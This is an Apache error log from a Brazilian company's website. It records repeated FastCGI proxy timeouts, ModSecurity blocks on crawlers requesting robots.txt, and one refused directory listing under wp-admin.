[Sun Mar 15 11:30:29.125796 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57924] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:30:50.135353 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58184] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:31:12.441859 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:31:29.086344 2026] [:error] [pid 21946:tid 140411699963648] [client 74.7.228.16:57572] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbCwXbQATo66fKoS7zDOgAAAMU"]
[Sun Mar 15 11:31:34.129816 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58656] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:31:56.041914 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59000] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:32:10.754475 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.244.31:41696] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbC6rABkC4fWIHEf8FnxAAAAEE"]
[Sun Mar 15 11:32:17.130953 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59250] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:32:38.117865 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59508] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:32:59.125778 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59746] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:33:21.125799 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60048] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:33:42.081819 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60322] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:34:03.045839 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60564] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:34:24.125807 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60794] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:34:45.129809 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:32790] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:35:06.137811 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33036] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:35:30.145771 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33302] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:35:51.057872 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33538] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:36:12.121958 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33754] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:36:33.125806 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:36:40.178840 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.228.16:55526] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbD-Jqj1wV0Si-OkedZvAAAAAg"]
[Sun Mar 15 11:36:55.057881 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34250] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:37:16.125784 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34430] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:37:38.149959 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:34600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:37:38.991530 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.244.31:35698] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbEMrABkC4fWIHEf8FoiAAAAEg"]
[Sun Mar 15 11:38:00.257815 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34836] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:38:22.053902 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35098] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:38:43.121909 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35430] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:39:04.153822 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35738] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:39:25.131394 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35988] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:39:46.982969 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36228] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:40:08.121822 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36466] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:40:29.133777 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36672] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:40:52.121199 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:36952] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:41:13.125790 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37178] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:41:34.152291 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37458] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:41:55.134373 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37744] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:42:01.310600 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.228.16:48506] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbFOXjZBu2q05ozVU_SuQAAAUQ"]
[Sun Mar 15 11:42:16.137780 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38072] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:42:37.121846 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38372] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:42:42.352564 2026] [:error] [pid 21946:tid 140411557287680] [client 74.7.244.31:36920] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbFYnbQATo66fKoS7zE2wAAANY"]
[Sun Mar 15 11:42:59.094014 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:43:20.098203 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:38848] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:43:43.112436 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39154] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:44:04.128912 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39450] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:44:29.117806 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39806] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:44:50.129827 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:40078] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:45:12.133793 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40386] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:45:35.113832 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40686] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:45:57.054668 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40996] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:46:19.060005 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41330] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:46:40.211176 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41612] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:47:01.121794 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42004] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:47:09.949981 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.228.16:45734] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbGbdSswJuvopo3lOjkowAAAI0"]
[Sun Mar 15 11:47:22.130040 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:47:43.125940 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42576] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:48:04.338308 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.244.31:50462] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbGpHbQATo66fKoS7zFqAAAAMM"]
[Sun Mar 15 11:48:04.463959 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42852] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:48:26.129801 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:48:47.093856 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:43344] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:49:08.060114 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43624] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:49:29.137502 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:43892] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:49:50.082824 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:50:11.517854 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44450] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:50:33.137963 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44676] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:50:56.181890 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:51:19.095044 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45150] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:51:41.133851 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45358] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:52:02.121817 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45654] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:52:23.133856 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45884] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:52:38.494905 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.228.16:43866] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbHtpqj1wV0Si-Okedc5wAAAAg"]
[Sun Mar 15 11:52:44.121260 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46090] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:53:05.131926 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:46326] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:53:05.570010 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.244.31:55426] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbH0bABkC4fWIHEf8Fq6wAAAFE"]
[Sun Mar 15 11:53:26.134136 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46582] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:53:47.125986 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46854] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:54:08.097800 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47106] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:54:29.111729 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47348] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:54:50.041982 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47578] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:55:11.129943 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47814] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:55:32.130623 2026] [proxy_fcgi:error] [pid 21946:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48070] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:55:54.137826 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48368] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:56:17.149870 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48676] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:56:39.121825 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48890] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:57:02.033896 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49216] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:57:23.125808 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49434] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:57:44.125778 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49652] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:58:05.125780 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49884] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:58:26.122136 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50102] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:58:35.546814 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.244.31:41810] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbJG9SswJuvopo3lOjmVwAAAIA"]
[Sun Mar 15 11:58:45.602476 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.228.16:58676] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbJJbABkC4fWIHEf8Fr7AAAAE4"]
[Sun Mar 15 11:58:48.121051 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:59:10.125787 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50682] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:59:31.125864 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 11:59:53.135284 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:00:14.130741 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51712] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:00:35.121200 2026] [proxy_fcgi:error] [pid 21533:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51996] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:00:56.126983 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52272] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:01:17.121802 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52466] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:01:38.118714 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52692] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:02:01.129804 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:53002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:02:24.109935 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:02:45.133828 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53594] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:03:07.133804 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53890] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:03:28.121853 2026] [proxy_fcgi:error] [pid 11972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54130] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:03:37.826997 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.244.31:51694] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbKSXbQATo66fKoS7zH6wAAANU"]
[Sun Mar 15 12:03:50.124271 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54408] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:04:11.129787 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:54652] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:04:32.117841 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54908] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:04:53.137946 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55200] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:05:14.137969 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55400] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:05:36.133847 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55640] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:05:39.163692 2026] [autoindex:error] [pid 21946:tid 140411624429312] [client 167.172.93.181:54804] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Sun Mar 15 12:05:57.125912 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55946] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:06:18.134036 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:06:39.125824 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:56676] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:07:00.137785 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56940] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:07:23.138363 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57180] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:07:45.445855 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:08:07.137837 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57700] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:08:28.168043 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:58018] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:08:49.125832 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58298] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:09:11.127427 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58562] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:09:32.113894 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58756] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:09:53.129936 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59068] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:10:14.041833 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59346] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:10:35.077935 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59620] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:10:57.095911 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59884] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:11:18.119695 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60060] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:11:39.129827 2026] [proxy_fcgi:error] [pid 21946:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60192] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:12:00.037826 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60444] AH01075: Error dispatching request to : (polling)
